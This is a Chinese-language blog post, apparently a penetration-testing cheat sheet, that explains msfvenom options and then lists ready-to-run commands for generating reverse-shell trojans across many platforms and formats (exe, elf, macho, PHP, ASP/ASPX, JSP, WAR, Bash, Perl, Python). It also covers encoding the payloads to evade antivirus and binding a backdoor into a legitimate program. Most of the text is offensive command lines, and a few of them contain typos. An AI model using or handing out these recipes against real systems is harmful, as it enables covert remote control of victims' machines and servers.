作者名:白昼安全
主页面链接: 主页传送门
创作初心: 一切为了她
座右铭: 不要让时代的悲哀成为你的悲哀
专研方向: web安全,后渗透技术
每日emo: 钱真的是万能的
一、msfvenom基本使用
1、–p (- -payload-options)
添加载荷payload。
(- -payload-options 列出payload选项)
2、–l
查看所有payload encoder nops。
3. –f (- -help-formats)
输出文件格式。
(- -help-formats 列出所有文件格式)
Executable formats:
asp, aspx, aspx-exe, axis2, dll, elf, elf-so, exe, exe-only, exe-service, exe-small, hta-psh, jar, loop-vbs, macho, msi, msi-nouac, osx-app, psh, psh-net, psh-reflection, psh-cmd, vba, vba
exe, vba-psh, vbs, war
Transform formats:
bash, c, csharp, dw, dword, hex, java, js_be, js_le, num, perl, pl, powershell, ps1, py, python, raw, rb, ruby, sh, vbapplication, vbscript
4、–e
编码免杀。
5、–a (- -platform – -help-platforms)
选择架构平台
x86 | x64 | x86_64
Platforms:
windows, netware, android, java, ruby, linux, cisco, solaris, osx, bsd, openbsd, bsdi, netbsd, freebsd, aix, hpux, irix, unix, php, javascript, python, nodejs, firefox, mainframe
6、–o
文件输出。
7、–s
生成payload的最大长度,就是文件大小。
8、–b
避免使用的字符 例如:不使用 ‘\0f’。
9、–i
编码次数。
10、–c
添加自己的shellcode。
11、–x | -k
捆绑。例如:原先有个正常文件normal.exe 可以通过这个选项把后门捆绑到这个程序上面。
二、msfvenom使用实例
下面列举一些平时常用的木马生成的案例,如下
1、普通生成
单纯生成一个后门,-p指定payload,-f指定生成的木马格式,-o指定木马保存位置
msfvenom -p < payload > < payload options > -f < format > -o < path >
msfvenom –p windows/meterpreter/reverse_tcp –f exe –o C:\back.exe 2、编码处理
使用-e对生成的木马进行编码处理
msfvenom -p < payload > -e < encoder > -i < encoder times > -n < nopsled > -f < format > -o < path >
msfvenom –p windows/meterpreter/reverse_tcp –i 3 –e x86/shikata_ga_nai –f exe –o C:\back.exe 3、捆绑
把后门捆绑到指定程序上,例子如下
Msfvenom –p windows/meterpreter/reverse_tcp –platform windows –a x86 –x C:\nomal.exe –k –f exe –o C:\shell.exe4、Windows
生成windows木马程序,这里以生成windows反向木马为例(-a选择架构平台)
Msfvenom –platform windows –a x86 –p windows/meterpreter/reverse_tcp –i 3 –e x86/shikata_ga_nai –f exe –o C:\back.exe
Msfvenom –platform windows –a x86 –p windows/x64/meterpreter/reverse_tcp –f exe –o C:\back.exe 5、Linux
生成可以控制linux的木马程序(下面的例子中为反向)
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST= < Your IP Address > LPORT= < Your Port to Connect On > -f elf > shell.elf 6、MAC
生成可以控制mac版本的木马程序,,格式如下
msfvenom -p osx/x86/shell_reverse_tcp LHOST= < Your IP Address > LPORT= < Your Port to Connect On > -f macho > shell.macho 7、PHP
生成php反弹木马程序
msfvenom -p php/meterpreter_reverse_tcp LHOST= < Your IP Address > LPORT= < Your Port to Connect On > -f raw > shell.php 8、Asp
生成asp木马程序
msfvenom -p windows/meterpreter/reverse_tcp LHOST= < Your IP Address > LPORT= < Your Port to Connect On > -f asp > shell.asp 9、Aspx
生成aspx木马程序
msfvenom -p windows/meterpreter/reverse_tcp LHOST= < Your IP Address > LPORT= < Your Port to Connect On > -f aspx > shell.aspx 10、JSP
生成jsp木马程序
msfvenom -p java/jsp_shell_reverse_tcp LHOST= < Your IP Address > LPORT= < Your Port to Connect On > -f raw > shell.jsp 11、War
war格式木马程序
msfvenom -p java/jsp_shell_reverse_tcp LHOST= < Your IP Address > LPORT= < Your Port to Connect On > -f war > shell.war 12、Bash
bash脚本格式木马程序
msfvenom -p cmd/unix/reverse_bash LHOST= < Your IP Address > LPORT= < Your Port to Connect On > -f raw > shell.sh 13、Perl
生成pl格式木马程序
msfvenom -p cmd/unix/reverse_perl LHOST= < Your IP Address > LPORT= < Your Port to Connect On > -f raw > shell.pl 14、Python
生成py格式木马程序
msfvenom -p python/meterpreter/reverser_tcp LHOST= < Your IP Address > LPORT= < Your Port to Connect On > -f raw > shell.py 
![[MRCTF2020]PixelShooter1题解](https://img-blog.csdnimg.cn/img_convert/939e6917d299dd952ad519b7ea375bfe.jpeg)
